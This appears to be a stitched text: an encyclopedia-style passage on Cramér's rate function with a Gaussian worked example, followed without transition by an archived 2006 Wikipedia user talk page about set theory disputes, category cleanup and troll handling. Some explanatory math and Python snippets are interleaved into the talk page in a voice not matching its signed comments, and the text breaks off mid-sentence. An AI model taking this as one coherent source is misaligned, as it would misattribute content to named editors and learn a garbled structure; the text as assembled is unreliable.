## History and basic development

The notion of a rate function began with the Swedish mathematician Harald Cramér's study of a sequence of i.i.d. random variables $(Z_i)_{i\in\mathbb{N}}$ at the time of the Great Depression. Namely, among some considerations of scaling, Cramér studied the behavior of the distribution of $X_n=\frac 1 n \sum_{i=1}^n Z_i$ as $n\to\infty$.[1] He found that the tails of the distribution of $X_n$ decay exponentially as $e^{-n\lambda(x)}$, where the factor λ(x) in the exponent is the Legendre transform (a.k.a. the convex conjugate) of the cumulant-generating function $\Psi_Z(t)=\log \mathbb E e^{tZ}.$ For this reason this particular function λ(x) is sometimes called the Cramér function. The rate function defined above in this article is a broad generalization of this notion of Cramér's, defined more abstractly on a probability space, rather than the state space of a random variable.
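As a quick worked example of this construction (the choice of Gaussian increments is just for concreteness): if the $Z_i$ are standard Gaussian, the cumulant-generating function is $\Psi_Z(t)=t^2/2$, so its Legendre transform is

$\lambda(x)=\sup_{t\in\mathbb{R}}\big(tx-\tfrac{t^2}{2}\big)=\frac{x^2}{2},$

and indeed $\frac 1 n\log \Pr(X_n\ge a)\to -\frac{a^2}{2}$ for $a>0$. The function $x\mapsto x^2/2$ is a good rate function in the sense defined above, since its sub-level sets are closed bounded intervals and hence compact, with the rate $n$ playing the role of $1/\delta$.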
# User talk:Trovatore/Archive03 This archive page covers approximately the dates between 12 February 2006 and 4 December 2006. Post replies to the main talk page, copying or summarizing the section you are replying to if necessary. I will add new archivals to User talk:Trovatore/Archive04. (See Wikipedia:How to archive a talk page.) Thank you. Trovatore 07:27, 15 January 2007 (UTC) ## Re: Footnote/MathML bug Hi Trov, I've replied to you comment on my talk page. Paul August 23:18, 12 February 2006 (UTC) Saw it, thanks. If I see the bug again (and it's reasonably convenient) I'll grab the HTML source in case there's some developer who'd be willing to take a look at it. Do you know who I might send it to? --Trovatore 23:21, 12 February 2006 (UTC) Not really. Paul August 23:35, 12 February 2006 (UTC) I'd be interested in the HTML source. I think it might be related to bug 3504, but it's only a wild guess, and it wouldn't explain why you see the bug only intermittently. -- Jitse Niesen (talk) 01:31, 13 February 2006 (UTC) ## Wow! I should have asked for a pizza along with the explanation of omega-completeness. :) --moof 06:38, 14 February 2006 (UTC) ## Combined set theory Hi Trovatore. Have you taken a look at combined set theory? I've proposed it for deletion as original research, based on the authors comments at talk:combined set theory. If you think there is anything worth saving there, please remove the "PROD" tag. Thanks — Paul August 15:01, 22 February 2006 (UTC) Looks like a straightforward application of the NOR policy to me; I've noted before that in the math project we tend to be a little tolerant of minor OR (observations arrived at by routine methods, when they clarify issues in the article) but we can hardly allow an entire article on unpublished research. Once published it might well be an interesting subject for an article, though I haven't read deeply enough to really know if there's any there there. --Trovatore 16:11, 22 February 2006 (UTC) Yes that's what I figured, thanks for taking a look. Paul August 20:15, 22 February 2006 (UTC) ## twin prime conjecture Now on my watchlist. Dmharvey 03:18, 3 March 2006 (UTC) Thanks. --Trovatore 03:25, 3 March 2006 (UTC) Now on mine too. :) Oleg Alexandrov (talk) 03:37, 3 March 2006 (UTC) ## Good work Congratulations on the quick and excellent job of completing the article on Renato Caccioppoli initiated by me! --R.Sabbatini 10:37, 4 March 2006 (UTC) Thanks! --Trovatore 16:50, 4 March 2006 (UTC) ## Chinotto I think we both know what the pronunciation is but it's the phonetic transliteration that's the problem. When I read "keenAWtoh" I hear a strong New York accent! We need an accent-free version, otherwise I think it is misleading for non-Americans. Could you do an IPA version? (I'm not confident enough with IPA vowels.) Nick 18:57, 5 March 2006 (UTC) Most of the IPA symbols show up as boxes for me. I wish we'd move to Kirshenbaum, in which I'd write it "ki 'nOt to". --Trovatore 19:02, 5 March 2006 (UTC) ## mathematical induction this just doesn't strike me as an encyclopedia article. It would be a good sort of observation to include in a textbook, maybe for a discrete math course. 
--Trovatore 06:55, 6 March 2006 (UTC) Here's an exercise for you: 0 is not a sum of fewer than 0 numbers each of which is smaller than 0; 1 is not a sum of fewer than 1 numbers each of which is smaller than 1; 2 is not a sum of fewer than 2 numbers each of which is smaller than 2; 3 IS a sum of fewer than 3 numbers each of which is smaller than 3; generally, n IS a sum of fewer than n numbers each of which is smaller than n, for n ≥ 3. Comment on the relevance to this article. The numbers 0, 1, and 2 correspond to the three forms. Michael Hardy 21:54, 6 March 2006 (UTC) And this has what to do with whether this is a suitable topic for an encyclopedia article? Come on, Michael, we all know you've written many many good articles. This isn't one of them. The case division doesn't even have any precise meaning that I can see (for example, you can always re-index to make n=0 the "substantial" case, assuming we agree on what a "substantial" case is). It's a didactic observation worth communicating to students; that doesn't make it encyclopedic. --Trovatore No, you can't reindex that way, in the relevant sense. There is an obvious sense in which it is trivial to reindex that way, but that is not the relevant sense. To see why not, look carefully at the newly added example concerning the triangle inequality. If you're confusing the trivial sense in which you can reindex, with the actually relevant sense in which you cannot, then you haven't understood what this is about yet. But I think the recent edits, leaving the article no longer a stub, should make it clear. Michael Hardy 23:34, 6 March 2006 (UTC) Oh. One other remark: n = 0 n=0 The former is generally considered good style and is followed by TeX, but in non-TeX notation it requires conscious attention. (But ignore this remark until after you've digested my other comments.) Michael Hardy 23:35, 6 March 2006 (UTC) ...and now I've added Polya's famous proof that there is no horse of a different color. In some senses, that is the Platonic form of this idea. Michael Hardy 00:10, 7 March 2006 (UTC) ## Three forms of mathematical induction It was not intended to teach mathematical induction. It was not intended to explain what mathematical induction is, nor how to use it. What I see is (mostly) a bunch of non-mathematicians looking at the stub form in which the article appeared when it was nominated from deletion, and seeing that • It was not comprehensible to ordinary non-mathematicians who know what mathematical induction is, and • The article titled mathematical induction is comprehensible to ordinary non-mathematicians, even those who know --- say --- secondary-school algebra, but have never heard of mathematical induction. And so I have now expanded the article far beyond the stub stage, including • Substantial expansion and organization of the introductory section. • Two examples of part of the article that is probably hardest to understand to those who haven't seen these ideas. • An prefatory statement right at the top, saying that this article is NOT the appropriate place to try to learn what mathematical induction is or how to use it, with a link to the appropriate article for that. It explains that you need to know mathematical induction before you can read this article. Therefore, I invite those who voted to delete before I did these recent de-stubbing edits, to reconsider their votes in light of the current form of the article. (Nothing like nomination for deletion to get you to work on a long-neglected stub article!) 
Michael Hardy 23:30, 6 March 2006 (UTC) • Michael, I'm afraid I'm still not all that convinced. I see what you're getting at now, but some things come to mind: 1. You seem to be claiming, implicitly, that it's rare to have a proof by induction in which the base case and the induction step are both nontrivial, and where the first does not reduce to the second. That's probably true, if you're willing to work hard enough to do the reduction, but then it turns into a Scholastic argument about whether the idea of the base case is "the same" as the idea of the induction step. 2. I suspect that the reason you're having the nontrivial case show up when you have two prior steps is that you're using binary functions. If you were proving something analogous about ternary functions, wouldn't it show up only after you have three prior steps? The whole thing reminds me a little of the "threeness" idea of Charles Sanders Pierce. --Trovatore 02:38, 7 March 2006 (UTC) ## binary and ternary I suspect that the reason you're having the nontrivial case show up when you have two prior steps is that you're using binary functions. If you were proving something analogous about ternary functions, wouldn't it show up only after you have three prior steps? Can you do better than to merely suspect? How about an example of such a case involving ternary functions? The identity relation has an inherently binary character: if any two horses are of the same color, then all horses are of the same color. The addition and multiplication operations have an inherently binary character: if we can find the sum of any two numbers, then we can find the sum of any finite number of numbers. In both cases, breaking a set of n members into a union of fewer than n sets of size smaller than n is involved. That won't work if n = 2, so that is the basic case in induction arguments of this form.; we cannot reach the number 2 from below. Does anything have an inherently ternary character? Here's an attempt: A set A is linearly ordered by a relation "<" if and only if every subset B of A such that |B| = 3 is linearly ordered by that relation. Now are there any corresponding induction proofs? Michael Hardy 23:02, 14 March 2006 (UTC) Hmm, I'm not sure. Part of the problem is that the characterization above isn't quite right in general (doesn't work if A has cardinality 1 or 2) But it's this attempted divination of the "inherent character" of the base case that makes me uneasy with the whole argument. Whether natural-seeming definitions say something sensible in trivial cases is, I think, largely a matter of luck. In some cases, like your example with partitions, it does. In others, like whether 1 is a prime number, it doesn't (the most natural definitions make 1 a prime, but that just doesn't work right). That's why I'd like you to give a precise characterization of what you're talking about, and preferably find someone who's written about it. --Trovatore 23:18, 14 March 2006 (UTC) ## Trashing my introduction to "large countable ordinals" I do not appreciate your trashing of my introduction to "large countable ordinals". Granted that it was not polished yet and your added material is good. But you took out some important information. Also I think that there should be a section header before the introductory material to make it easier to edit it without having to edit the entire article. JRSpriggs 03:59, 16 March 2006 (UTC) I already repaired the introductions to large countable ordinals and ordinal arithmetic. 
Please do not delete anything from them again without discussing it first. JRSpriggs 04:26, 16 March 2006 (UTC) JRSpriggs, your wording is a bit too strong I think. I am sure you and Trov can reach a reasonable agreement without getting to "trash" things and arguing "whose" article that is. Oleg Alexandrov (talk) 16:00, 16 March 2006 (UTC) Now that I have had a day to cool off, I have tried to address Trovatore's concerns. Please let me know whether you like the new beginnings of the articles. I got angry because he seemed to come out of nowhere to make a lot of changes all at once while admitting that he had not even read the article carefully. Also he delete my links back to the main article "ordinal number" and other links without seeming to care about the effort I took to create them. JRSpriggs 08:05, 17 March 2006 (UTC) Thank you for the good things that you added to these articles. I now feel that I over-reacted to a minor inconsideration, and I should not have yelled at you. Please feel free to delete these comments and forget the whole thing. JRSpriggs 12:34, 19 March 2006 (UTC) Hi, Mike! I'm a Lloydie who decided to poke around your page a little bit after I saw your flag. Just so you'll know, I got a little bit crosswise with JRSpriggs when I first started working on Wikipedia, but now we talk to each other quite cordially almost all the time. Have a great day! ;^> DavidCBryant 11:19, 13 January 2007 (UTC) To David: I assume that you are talking about Mathematical induction#Infinite descent and Talk:Mathematical induction#Who is JRSpriggs? (which I found by going over your early contributions). Frankly, I had forgotten all about that. It seemed insignificant to me. I am sorry if it upset you. As for this section and my dispute with Trovatore, it occurred ten months ago when I had just started working on Wikipedia and just three files occupied my entire attention. So when he changed one of them unexpectedly, I over-reacted. I was trying to write something about ordinals and he modified it because of considerations related to cardinals which felt like an invasion from another part of mathematics. Also I did not understand how Wikipedia works generally then. Actually, I was hoping that Trovatore would eventually delete (or at least archive) this section of his talk page, because I now feel embarrassed by it. JRSpriggs 04:41, 15 January 2007 (UTC) ## another thing for you to vote on Could you please vote at Wikipedia:Articles_for_deletion/Proof_that_22_over_7_exceeds_π? Some people are actually saying any article devoted to a partiucalar mathematical proof is non-encyclopedic and should be deleted! Or that all articles primarily for mathematicians, that the general reader will not understand, should be deleted. Michael Hardy 00:13, 17 March 2006 (UTC) ## Criteria... Don't you hate that particular phenonema? (; Sorry, I couldn't resist.--Lacatosias 09:01, 17 March 2006 (UTC) ## Image copyright problem with Image:NetscapeNewsOops.jpg Thanks for uploading :Image:NetscapeNewsOops.jpg. The image has been identified as not specifying the copyright status of the image, which is required by Wikipedia's policy on images. If you don't indicate the copyright status of the image on the image's description page, using an appropriate copyright tag, it may be deleted some time in the next seven days. If you have uploaded other images, please verify that you have provided copyright information for them as well. This is an automated notice by OrphanBot. 
For assistance on the image use policy, see User talk:Carnildo/images. 00:18, 18 March 2006 (UTC) ## Bogdanov Affair Hi Trovatore, You asked an excellent question on the talk page of the "Bogdanov affair" article. I try to answer here because I cannot do it on the talk page of the article : the Arbcom banned me from Wikipedia, even for the talk page. The Arbcom banned all people involved in an "edition war" about the Bogdanov affair. For them, "entangled" just means that we had already argued about this affair on several fora (Usenet and Web) before we "arrived" on Wikipedia. The worst problem is that after this strong decision, they changed it : they "saved" 2 editors, who were 2 detractors of the Bogdanovs. One of them, rbj, had violently insulted them on the talk page of the article, without getting any reproach from the administrators who took part to the article... And then, he was "nominated" by the Arbcom to be able to write a NPOV article on these people he had insulted ! As I protested against this unfairness on the talk page, the Arbcom decided to extend the ban to the discussion pages... Of course the article is the less NPOV you can imagine : they even removed the external links to three sites about the Bogdanovs (including mine) without explanation, surely because they gave a good image of them. Since we are banned, we cannot neither put them back, nor protest against this new censorship on the talk page. I will write soon an article about this "affair Wikipedia" on my site (www.bogdanov.ch, one of the sites whose link they censored). Thank you and bravo, anyways, for having asked this question : I was surprised that nobody reacted to this argument of the Arbcom. Laurence67 ## Winning strategy Trovatore - I moved the article to that category because it seemed more similar to mathematical analysis of games like chess and nim, rather than game theory in economics. I understood that to basically be the distinction between our categories "game theory" and "combinatorial game theory". If you think it belongs in the other category, that's cool. I'm just trying to keep things organized... :) --best, kevin [kzollman][talk] 04:18, 28 March 2006 (UTC) I don't know whether it belongs in category:game theory either, but combinatorial game theory seems too specific for the article. --Trovatore 04:19, 28 March 2006 (UTC) I agree, there are several articles along these lines that don't really fit in with game theory as studied in economics, philosophy, and biology nor do they fit into combinatorial game theory. Perhaps a new category mathematical game theory? I don't like the name, since it implies other types of game theory is not mathematical. Got any ideas? --best, kevin [kzollman][talk] 04:29, 28 March 2006 (UTC) So there seem to be four classes of games that need to be taken into account, with some overlap between classes and possibly some common features I'm not capturing: 1. Games as in economics: Mostly not of perfect information, finite length, used instrumentally in studying other things. 2. Games that game players play (chess, etc): Some perfect information, some not. Finite length. Played as ends in themselves. 3. Games of the sort I'm interested in: Mostly infinite length, mostly perfect information, used instrumentally. 4. Combinatorial game theory: Perfect information, finite length, very specific winning condition (last player with a legal move wins), used both instrumentally and as ends in themselves. 
This term is very specific to the work of John Horton Conway and those who have followed up on it. Now I think winning strategy was aimed at all four sorts of games, which is why I wouldn't put it in category:combinatorial game theory; it's not specific to the Conway theory. Because of its generality I found it ill-suited for the determinacy article, and put my own definition of winning strategy there. Anyway, just some thoughts; I don't have a good answer at the moment. Which of these four classes do you see as part of "mathematical game theory"? --Trovatore 13:00, 28 March 2006 (UTC) I was thinking less about a division that was a nice cleavage of the topic, but rather a division based on which types of academics work on those. 1 is studied widely (econ, bio, philo, polisci, etc.) and known to most people as game theory. 2-4 are studied primarily by mathematicians whose interest is in them as mathematical objects, not as tools for empirical study. Could you say more about how winning strategy applies to 1? The thing that led me to move it was its reference to "winning" which is a term not oft used in type 1. --best, kevin [kzollman][talk] 18:09, 28 March 2006 (UTC) ## Do you have any suggested articles to work on? Oleg said that you might be able to suggest articles in the area of ordinal numbers or cardinal numbers which need work. Or topics for which new articles should be written. Do you have any suggestions? JRSpriggs 07:01, 30 March 2006 (UTC) A lot of the articles linked from list of large cardinal properties could use a lot of work; many of them are just bare definitions and could use background, context, and applications. There doesn't seem to be an admissible ordinal article, or one on the singular cardinal hypothesis. --Trovatore 16:14, 30 March 2006 (UTC) Another general suggestion: Look on Wikipedia:Requested articles/Mathematics#Logic for articles people have requested, and at Category:Mathematical logic stubs for articles needing serious expansion. --Trovatore 18:38, 30 March 2006 (UTC) Thanks for the information. JRSpriggs 04:15, 31 March 2006 (UTC) P.S. Your user-talk page is on my watch list. So you do not need to put a message on my user-talk page when you reply to one of my messages here. JRSpriggs 04:40, 31 March 2006 (UTC) I have added a lot of material to the article Constructible universe. Please proof-read it or give me comments on it. JRSpriggs 09:21, 15 April 2006 (UTC) ## Juan Rico No, he wasn't Argentine, his mom was killed in BA, but the family spoke Tagalog at home, so were almost certainly of Filipino descent. Given who wrote the book, characters speaking Anglic in public (not English, but close), and other characters' names, I think we can assume that he and his family lived in North America, probably the former US. MilesVorkosigan 18:46, 10 April 2006 (UTC) Well, but who says it's about descent? I gather that there was a single world political structure so it may not make sense to talk about "citizenship" per se, but in that case if they lived in North America they were North Americans (just as a US citizen who moves to California is a Californian). --Trovatore 18:49, 10 April 2006 (UTC) ## Mexican mathematicians Hi Mike. I can give you some names of people who are or were both mathematicians at UNAM and notable in some way or another. I would probably be unable to provide more than stubs, though, and I would not be able to do so in the near future; I am about to leave town, and the semester is winding down. 
Off the top of my head, I can suggest Alberto Barajas and Graciela Salicrup (both now deceased); Emilio Lluis Riera (the first Ph.D. given in the new Campus in Ciudad Universitaria); and Jose Antonio de la Peña, one of the top people in representations of algebras (you can get a biographical sketch in English by going to http://www.matem.unam.mx/personal/index-investigadores.html, clicking on his name, and then on the "Curriculum" link that appears in the window). Magidin 19:48, 11 April 2006 (UTC) ## Golden ratio To start, I thought: If Schroeppel claimed this, it has to be true. Then I remembered having noticed something like $\varphi^n = \frac{L_n + F_n \sqrt{5}}{2}.$ This is basically immediate from the closed-form expressions for $L_n$ and $F_n$. So all you need now is some n such that $L_n$ and $F_n$ are both even. LambiamTalk 00:15, 12 April 2006 (UTC) ## Donald A. Martin Hey do, Mike. Concerning Tony Martin's article, it could do with a few things such as date of birth, background, and explaining Martin's Axiom in layman's terms. Otherwise, nice work! Fergananim 19:46, 19 April 2006 (UTC) So unfortunately I'm missing some of that information. I think he was born in '42, because his sixtieth birthday celebration was held in '02, but birthdays aren't always celebrated on the exact year, so that's not for sure. He hails from West Virginia but I don't have a source for that. Explaining MA in layman's terms? Have at it; better you than me. I suppose some aspects of it could be explained to non-set-theorist mathematicians, but better than that I can't see. One thing that would be interesting to mention, but that I'm not sure just how to source and work into the article, is that he doesn't have a PhD. He got an offer before he'd finished his dissertation, and just never bothered to jump through the hoops. My guess would be he's the only living US mathematician of similar fame to be in that position. --Trovatore 23:14, 19 April 2006 (UTC) ## Re. Falsifiability and Math Your point is indeed Imre Lakatos' position on the matter, and is obvious only to mathematicians and their friends, which was why I asked CSTAR first. I happen to think the point can be said far less obtusely than it currently is in that article. Very much appreciate your reply...Kenosis 13:42, 20 April 2006 (UTC) ## Forza Italia Hi! The reason for emptying is that I had added a new Category:Members of Forza Italia to several members of that party which were not included in Category:Forza Italia politicians. Furthermore, the new cat. is consistent with others about Italian parties (i.e.: Members of the Italian Communist Party, Members of the Italian Liberal Party etc.) —The preceding unsigned comment was added by Attilios (talkcontribs) 16:45, 22 April 2006 (UTC) You're still not supposed to empty a cat on your own initiative. You should list it on categories for deletion. Another possibility is to make Category:Forza Italia politicians a subcat of Category:Members of Forza Italia (then articles that appear in the former should not appear in the latter). A note on wikimarkup: When you want a link to a category, as opposed to adding a page to a category, put a colon before the word "category". [[:Category:Members of Forza Italia]] gives a link; [[Category:Members of Forza Italia]] makes my talk page part of the category. --Trovatore 16:50, 22 April 2006 (UTC)
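Returning to the golden-ratio identity Lambiam quotes above: a minimal Python sketch confirms $\varphi^n = (L_n + F_n \sqrt{5})/2$ numerically and shows where both $L_n$ and $F_n$ are even. Nothing here comes from the original thread beyond the identity itself; the recurrence-based implementation and the choice to scan the first dozen values of n are my own.

```python
from math import sqrt

phi = (1 + sqrt(5)) / 2

def fib_lucas(n):
    """Return (F_n, L_n); both sequences satisfy a_n = a_{n-1} + a_{n-2},
    with seeds F_0, F_1 = 0, 1 and L_0, L_1 = 2, 1."""
    F, F_next = 0, 1
    L, L_next = 2, 1
    for _ in range(n):
        F, F_next = F_next, F + F_next
        L, L_next = L_next, L + L_next
    return F, L

for n in range(1, 13):
    F, L = fib_lucas(n)
    # the quoted identity: phi^n = (L_n + F_n*sqrt(5)) / 2
    assert abs(phi ** n - (L + F * sqrt(5)) / 2) < 1e-9 * phi ** n
    if F % 2 == 0 and L % 2 == 0:
        print(f"n = {n}: L_n = {L}, F_n = {F} are both even")
```

In the range scanned, both are even exactly when n is a multiple of 3 (the familiar parity pattern of the Fibonacci and Lucas numbers), so already n = 3 gives $\varphi^3 = (4 + 2\sqrt{5})/2 = 2 + \sqrt{5}$.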
OK, thanks. The sole thing is: "You are supposed to" is not such a nice expression to use, at least with me here. Attilios 17:07, 22 April 2006 (UTC) Well, I thought maybe you weren't familiar with the accepted procedures. Looking through your contributions I see you've been very energetic contributing to articles, but I don't see much activity in Wikipedia space, which is where the procedural stuff gets done. I didn't make this up; this really is the accepted procedure. See Wikipedia:Categories for deletion for details. --Trovatore 17:10, 22 April 2006 (UTC) OK. Now we have in the same article Berlusconi listed as Member of Forza Italia and Forza Italia politician, simply because you're sticking to paper procedures instead of the consistency of the encyclopedic content. I made a mistake, OK. But now? Why add a mistake to another? Let me know. Attilios Because maybe someone will object to the change. Not me; I don't really care. But someone could. You should undo the mistake by listing the category on Wikipedia:Categories for deletion. --Trovatore 18:40, 22 April 2006 (UTC) ## Merci for ze caring :D "boink" is a word I accidentally misused once...and to a woman, too. ;) --VKokielov 17:23, 26 April 2006 (UTC) ## Pornstar I did not "Know" that that photo was of a porn actress. My point, I think, was not to imply that I have never "studied" such copyrighted photos of women. When I was younger I was too familiar... my point was that there should be some way of protecting our kids from viewing sexually explicit stuff that adults may indulge in. Free speech on the internet is essential and I don't believe in censorship! I just am concerned about what kids can view on a safe free encyclopedia like Wikipedia. Let Bomis serve up Porn if they want to, but let Wiki be more family oriented. I'm sure its founder (Wales) would agree!--merlinus 14:25, 27 April 2006 (UTC) ## Saints Wikiproject I noted that you have been contributing to articles about saints. I invite you to join the WikiProject Saints. You can sign up on the page and add the following userbox to your user page. This user is a member of the Saints WikiProject. I also invite you to join the discussion on prayers and infoboxes here: Prayers_are_NPOV. Thanks! --evrik 16:57, 28 April 2006 (UTC) President Milosevic was called Sloba, not Slobo... Only Croats and Muslims call him Slobo... If you want to be part of it, please stay objective, and don't call him insulting names. Thank you. Dzoni 00:32, 29 April 2006 (UTC) ## Prodi You're right about Prodi. Sorry :-)--Stephen 17:12, 2 May 2006 (UTC) ## Hi, It's Merlinus It wasn't Vandalism to my own User Page. I was trying to make a link and I messed up and left a message saying so. Is my signer properly signing? --172.153.88.61 19:27, 2 May 2006 (UTC)? I think I restored my TALK page alright? Could you take a look? I have important things on there? I checked and I am properly signed on... I don't know why it's not registering my name as Merlinus but just the numbers 172.153.88.61. Could it be because my wife uses her own Wikipedia User Page? I don't want to reregister under another different name or anything?--172.153.88.61 19:31, 2 May 2006 (UTC) Hm, I don't know why you're having the problem with your login. You might try the following: At the login page, check the box that says "remember me". Then, once logged in, clear your browser cache. As to your pages: You now seem to have identical content in User:Merlinus and User:Merlinus/Recently read books. I doubt that's what you want. 
If you no longer want the latter page to exist, put the following line {{db|author request}} at the top of the latter page, and someone will come along and delete it. --Trovatore 23:22, 2 May 2006 (UTC) Oh, one more thing, about your talk page: You seem to have done a copy-and-paste from User talk:Merlinus/Recently read books to User talk:Merlinus. The problem with that is that the GFDL requires attribution for other people's work; this attribution is usually contained in the page history. User talk:Merlinus does not contain that history, so it could be judged a copyright violation. What you should probably do is: 1. Copy anything you want to save from User talk:Merlinus to User talk:Merlinus/Recently read books, noting the authors in the edit summary. 2. Get an admin to delete User talk:Merlinus. 3. Move User talk:Merlinus/Recently read books to User talk:Merlinus. Then the history will be preserved. --Trovatore 23:29, 2 May 2006 (UTC) ## Khodorkovsky and martyrdom Hi Heptor, A while back I was looking at the article on Mikhail Khodorkovsky and saw a section called "An attempt at martyr creation", which was clearly tendentious. I changed it to the more neutral "Martyr?", with the question mark indicating that no position was being taken. I see you changed it back, claiming that the original was "more neutral". I think it's far less neutral; it's quite clearly anti-Khodorkovsky, whereas my version just asks a question. Maybe you can think of something better, but please don't change it back to the original POV version. --Trovatore 15:29, 2 May 2006 (UTC) Hi Trovatore, I'd say that "An attempt of martyr creation" is more neutral, but this is of course in the eye of the beholder. "A martyr to some" is fine though, do you agree? -- Heptor talk 10:01, 3 May 2006 (UTC) It's alright. I can't imagine how you can think the "attempt" wording is more neutral, though. It directly accuses Khodorkovsky's supporters of trying to manipulate perceptions. --Trovatore 14:24, 3 May 2006 (UTC) ## Godel So what was the reason for your reversion? -- PCE 01:57, 4 May 2006 (UTC) The fact that what I reverted was nonsense --Trovatore 02:56, 4 May 2006 (UTC) Are you referring to Rucker's proof or to my refutation? -- PCE 03:39, 4 May 2006 (UTC) Perhaps you could explain instead why the following is nonsense: 1. Let x = 1. 2. Square both sides: x² = 1 3. Subtract 1 from both sides: x² – 1 = 0 4. Factor: (x+1)(x-1) = 0 5. Divide both sides by (x-1): x+1 = 0 6. Substitute the value of x: 1 + 1 = 0 7. Conclusion: 2 = 0. -- PCE 03:53, 5 May 2006 (UTC) Yeah, I could. --Trovatore 03:54, 5 May 2006 (UTC) Okay. Good to see you are up. Thought I had stumped you with the above question about Rucker's proof or my refutation. -- PCE 03:57, 5 May 2006 (UTC) How about this: think of yourself as Gödel and answer the question as if you were him? -- PCE 15:55, 5 May 2006 (UTC) Okay, let's go on to something else... assuming that Gödel's Incompleteness Theorem only applies to the natural numbers does that mean it applies only to base 10? --- PCE 22:50, 5 May 2006 (UTC) This is a trivial question; if you really don't know the answer, then you need to spend a lot more time acquiring some basic background in logic and foundations of math before it will be a sensible use of time to discuss it with you. The other possibility is that you do know the answer, and are just trying to make trouble. Either way I don't see the point in responding further. --Trovatore 23:06, 5 May 2006 (UTC)
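The flaw in the 2 = 0 derivation quoted above is step 5: dividing both sides by x − 1 is a division by zero, since x = 1 makes x − 1 = 0. A short Python check, offered only as an illustration of that one point, makes it concrete.

```python
x = 1

# Steps 1-4 are fine: (x + 1)(x - 1) really is 0, but only because the factor (x - 1) is 0.
assert (x + 1) * (x - 1) == 0

print(x - 1)  # 0 -- this is the quantity step 5 proposes to divide by
try:
    (x + 1) * (x - 1) / (x - 1)
except ZeroDivisionError as err:
    print("step 5 is invalid:", err)  # nothing after step 5 follows
```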
Well part of the reason for the success of a wiki is that it serves as an opportunity for newbies to learn from experts even if the experts only suggest an article to read. But when an expert is so rude and arrogant that he deletes an edit without even so much as a referral, much less an explanation as to why he performed the deletion, then that expert is not conducive to donations of a financial kind. Comprenda? -- PCE 23:33, 5 May 2006 (UTC) So you're holding Trov responsible for your unwillingness to make a monetary donation to the Wikimedia Foundation, because he didn't give you a reference to show that Gödel's incompleteness theorem is not dependent on the radix used to denote the natural numbers? What is this, extortion? -lethe talk + 00:56, 6 May 2006 (UTC) User_talk:Paul_August#Your_revertion..._G.C3.B6del_Incompleteness_Theorem -lethe talk + 02:10, 4 May 2006 (UTC) [email protected] seems like a troll to me. Do not feed the trolls. JRSpriggs 05:28, 6 May 2006 (UTC) JRSpriggs seems like an ostracist to me. -- PCE 13:41, 6 May 2006 (UTC) ## Wrongful and malicious deletion of talk pages on your part... When you deleted the talk topic "PCE's doubts", you deleted the following commentary and other valuable points of discussion which, although they may not be of any value to you, may be of value to others, if for no other reason than the amount of work and effort others have poured into them. See falsifiability for a crucial difference between the laws of physics and theorems in mathematics. The laws of physics are not "proved" in the same way that mathematical theorems are. Gödel's theorem applies, in the original version, to "Principia Mathematica", but there are many generalizations that apply to other axiomatic systems (such as ZFC) or other formal constructs (such as Turing machines). I am not sure where the borderline between Theoretical/Pure Mathematics and Applied Mathematics is precisely, but it seems clear that Gödel's theorem is a theorem of pure mathematics. Aleph4 16:54, 6 May 2006 (UTC) How about next time, before you delete any discussion in which you are not an immediate participant, you refrain from such deletion until you have advised the actual participants what you intend to do. If you can not do that then how about surrendering your status as a fellow Wikipedian or start making a few financial contributions to help pay the bills. -- PCE 20:50, 8 May 2006 (UTC) I didn't delete it. I moved it to a new "arguments" subpage. --Trovatore 20:53, 8 May 2006 (UTC) I agree that moving the discussion to a subpage was a good idea, for the reason that Trovatore gave: Please reserve this page for discussions about improving the *article*. Really, such discussions should not be held on Wikipedia at all -- this is an encyclopedia, not a chat forum, nor a math class. But sometimes it is hard to resist. --Aleph4 21:54, 8 May 2006 (UTC) Okay. My apologies. The whole concept of a wiki is new to me since I have only recently begun to participate regularly in newsgroups (chat forums). I am now in the process of learning wiki protocols. Thanks for your heads-up and for your reply. Again my apologies. -- PCE 17:36, 10 May 2006 (UTC) I am aware that you've previously turned down a nomination for adminship. I think you're a very valuable contributor and would make a useful addition to our phalanx of math admins. Adminship should probably be a matter of course for editors who've been productive and noncontroversial here as long as you. 
If you think you could manage to mostly ignore the addition of a few extra buttons to your wikipedia interface without having more time sucked up by the project than is already, I'd be happy to nominate you again (as would many others I'm sure). If nothing else, it might be expedient for dealing with new appearances of WAREL puppets. -lethe talk + 10:04, 11 May 2006 (UTC) PS did you take your username from the opera? -lethe talk + 10:05, 11 May 2006 (UTC) A troubadour with a rollback button, now that will be interesting. Oleg Alexandrov (talk) 15:53, 11 May 2006 (UTC) Well, not just now; thanks, Lethe and Oleg. I've got a lot of things to think about right now, moving and changing jobs. BTW I don't know that particular opera per se; I like the name "Trovatore" because I'm an Italophile and like to sing. --Trovatore 02:59, 12 May 2006 (UTC) It's the opera that the famous Chorus of the Anvils is from. If operas are your thing, that's a good one. -lethe talk + 11:46, 12 May 2006 (UTC) ## Romano Prodi I copied your request for protection from WP:AN/I to WP:RPP, where you're likely to get a quicker response. AmiDaniel (talk) 23:34, 13 May 2006 (UTC) Thanks. --Trovatore 00:25, 14 May 2006 (UTC) ## Hi I understand, but the problem is that semiprotection isn't intended to prevent anons from editing content. Only to prevent them from vandalizing. At its heart, this is a content dispute between two anon users, so semiprotection doesn't apply. Hopefully this will encourage them to come to the talk page and discuss things. If that doesn't work quickly, I'll remove the protection. · Katefan0 (scribble)/poll 21:02, 15 May 2006 (UTC) OK, I understand; this is probably consonant with current policy. In my opinion the policy should be changed; anons should be allowed to make non-controversial edits, but once things become disputed, they should have to log in if they want to continue. It's frustrating to try to discuss things with ghosts. --Trovatore 21:08, 15 May 2006 (UTC) There is a guideline that sorta says as much; Wikipedia:Accountability. But of course, it's just a guideline, not an official policy. You may find it useful to try to guide the two anons to this page, though. Sometimes it's enough to convince people to sign up for accounts. · Katefan0 (scribble)/poll 23:27, 15 May 2006 (UTC) ## Crazy Mathematicians I am fascinated by the tragedies of some modern mathematicians - Cantor, Gödel, Kaczynski. I believe I sat next to Kaczynski in the back of a Berkeley classroom one day years ago. He was the assistant Professor auditing another's class; I was the flake flunking out. I was encouraged to see your recent post on the Georg Cantor discussion page - encouraged to besiege you with a Cantor question: What was Cantor's motive in using the Hebrew alphabet? I can see three plausible answers: Clarity - He wanted something not to be confused with all the other, mostly Greek, symbols. Homage - He WAS proud of his heritage and desired to acknowledge it. Ego - mentioned in my Cantor page post - He wanted to emphasize the drama and significance of his theory by using one of the oldest alphabets, even older than Greek. Any clues about his motivations? --Therealhrw 17:45, 23 May 2006 (UTC) I'd just be speculating, and I'm not really very good at history. --Trovatore 17:54, 23 May 2006 (UTC) ## Cantor's diagonal argument Given a sequence of objections to 